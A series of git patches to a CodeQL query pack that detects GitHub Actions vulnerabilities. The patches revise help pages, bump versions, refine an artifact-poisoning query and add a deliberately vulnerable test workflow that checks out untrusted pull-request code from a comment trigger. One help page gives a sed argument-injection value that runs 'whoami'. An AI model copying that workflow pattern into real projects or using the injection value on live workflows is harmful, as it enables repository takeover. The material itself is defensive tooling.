b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md index 70df52dc4635..c777e1980393 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. @@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -59,7 +59,7 @@ jobs: ### Correct Usage -The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch. +The following workflow runs untrusted code in a non-privileged job and the cache is scoped to the Pull Request branch. ```yaml name: Secure Workflow diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md index 105fe6ecd69e..4e9b389834e8 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description @@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: @@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md index 105fe6ecd69e..4e9b389834e8 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description @@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: @@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md index be1b566083ae..1e7ea120cbaa 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md @@ -10,7 +10,7 @@ When an `if` condition erroneously evaluates to `true`, unintended steps may be To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: -1. Do not use Workflow Expressions in `if` conditions. +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. 2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. 3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. @@ -18,45 +18,45 @@ To avoid the vulnerability where an `if` condition always evaluates to `true`, i ### Correct Usage -1. Do not use Workflow Expressions: +1. Omit `${{` and `}}` in `if` conditions: -```yaml -if: steps.checks.outputs.safe_to_run == true -if: |- - steps.checks.outputs.safe_to_run == true -if: | - steps.checks.outputs.safe_to_run == true -``` + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` -2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: -```yaml -if: ${{ steps.checks.outputs.safe_to_run == true }} -if: |- - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ### Incorrect Usage 1. Do not mix Workflow Expressions with un-delimited expressions: -```yaml -if: ${{ steps.checks.outputs.safe_to_run }} == true -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` 2. Do not include trailing new lines or spaces: -```yaml -if: | - ${{ steps.checks.outputs.safe_to_run == true }} -if: > - ${{ steps.checks.outputs.safe_to_run == true }} -if: " ${{ steps.checks.outputs.safe_to_run == true }}" -if: |+ - ${{ steps.checks.outputs.safe_to_run == true }} -if: >+ - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ## References diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md index 2d7afb6b66e1..9b1782d6ba84 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations @@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow @@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md index 2d7afb6b66e1..9b1782d6ba84 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations @@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow @@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md index c391e1255edc..71ba2032a9d0 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md index c391e1255edc..71ba2032a9d0 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md index c391e1255edc..71ba2032a9d0 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples From d6027267aaeda10673ad3f7433b9e1085dbb0dce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Mon, 12 Aug 2024 09:31:58 +0000 Subject: [PATCH 478/707] fix variable name --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 436cf6859964..36622d127d80 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted ### Incorrect Usage -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `PATH` is set: ```yaml steps: diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 436cf6859964..36622d127d80 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted ### Incorrect Usage -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `PATH` is set: ```yaml steps: From 0baf7e3cef12575952606e6716e72ab0b36556b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Aug 2024 13:08:38 +0200 Subject: [PATCH 479/707] Update qlpack.yml --- ql/src/qlpack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9b4795a0d8a4..b0d446479d88 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.36 +version: 0.1.37 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1ca985b4152e9bad720464f066e35a0a69c89a68 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Aug 2024 13:09:06 +0200 Subject: [PATCH 480/707] Update qlpack.yml --- ql/lib/qlpack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d9889fb08694..887228ecf882 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.36 +version: 0.1.37 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 From 293dd1a32b4a757069ace51820ce3e0472db2257 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 23 Aug 2024 17:40:25 +0200 Subject: [PATCH 481/707] Update ArgumentInjectionCritical.md --- ql/src/Security/CWE-088/ArgumentInjectionCritical.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md index 4957297be92a..92e480e4a7ae 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -31,7 +31,7 @@ jobs: cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt ``` -An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. +An attacker may set the body of an Issue comment to `BAR/g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. ## References From 4f57aade35d120635eca67e5f1b706fd9d04b3fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 10:49:27 +0200 Subject: [PATCH 482/707] Improve accuracy of actions/download-artifact as a source If upload is on the same workflow, it needs to be triggered by a priv workflow --- .../security/ArtifactPoisoningQuery.qll | 6 +- .../.github/workflows/direct_cache6.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 100 ++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 3 - .../CWE-829/ArtifactPoisoningMedium.expected | 4 - .../UntrustedCheckoutCritical.expected | 10 ++ 6 files changed, 115 insertions(+), 10 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 08a49ab1abbf..6881caccd52e 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -26,8 +26,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us exists(this.getArgument("github-token")) or // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step - exists(UsesStep checkout, UsesStep upload | - this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + exists(LocalJob job, UsesStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob() = job and + job.getAStep() = checkout and + job.getATriggerEvent().getName() = "pull_request_target" and checkout.getCallee() = "actions/checkout" and checkout.getAFollowingStep() = upload and upload.getCallee() = "actions/upload-artifact" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index 3f35068eb7dc..5948474d21ad 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -23,7 +23,7 @@ jobs: key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} restore-keys: ${{ runner.os }}-pip- - name: Download artifact - uses: actions/download-artifact@v4 + uses: dawidd6/action-download-artifact@v2 with: name: results path: results/ diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml new file mode 100644 index 000000000000..5494d97797e2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -0,0 +1,100 @@ +name: Auto Bump Versions + +on: + issue_comment: + types: [created, edited] + +jobs: + add-same-version-label-to-pr: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label') + steps: + - uses: actions/checkout@v3 + - name: Add same version label + uses: actions/github-script@v6 + if: success() + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.addLabels({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + labels: ['same version'] + }) + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Added [same version] label :)!' + }) + + build: + if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') + runs-on: ubuntu-latest + + steps: + - name: Get PR details + uses: actions/github-script@v6 + id: get-pr + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: context.issue.number + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + try { + const result = await github.rest.pulls.get(request) + return result.data + } catch (err) { + core.setFailed(`Request failed with error ${err}`) + } + + - name: Checkout PR + uses: actions/checkout@v3 + with: + repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} + ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} + + - name: Update version minor + if: contains(github.event.comment.body, '/version minor') + run: | + ./version.sh -u -n + echo "BUMP_TYPE=minor" >> $GITHUB_ENV + + - name: Update version major + if: contains(github.event.comment.body, '/version major') + run: | + ./version.sh -u -m + echo "BUMP_TYPE=major" >> $GITHUB_ENV + + - name: Update version patch + if: contains(github.event.comment.body, '/version patch') + run: | + ./version.sh -u -p + echo "BUMP_TYPE=patch" >> $GITHUB_ENV + + - name: Add labels + uses: actions/github-script@v6 + if: ${{ env.BUMP_TYPE }} + with: + script: | + github.rest.issues.addLabels({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + labels: ['version/${{ env.BUMP_TYPE }}'] + }) + + - name: Push Changes + if: ${{ env.BUMP_TYPE }} + run: | + git config user.name 'github-actions[bot]' + git config user.email 'github-actions[bot]@users.noreply.github.com' + git pull + git add . + git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff + git push + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 56ec92c54b6c..11c6b98dc874 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -14,7 +14,6 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -46,8 +45,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | 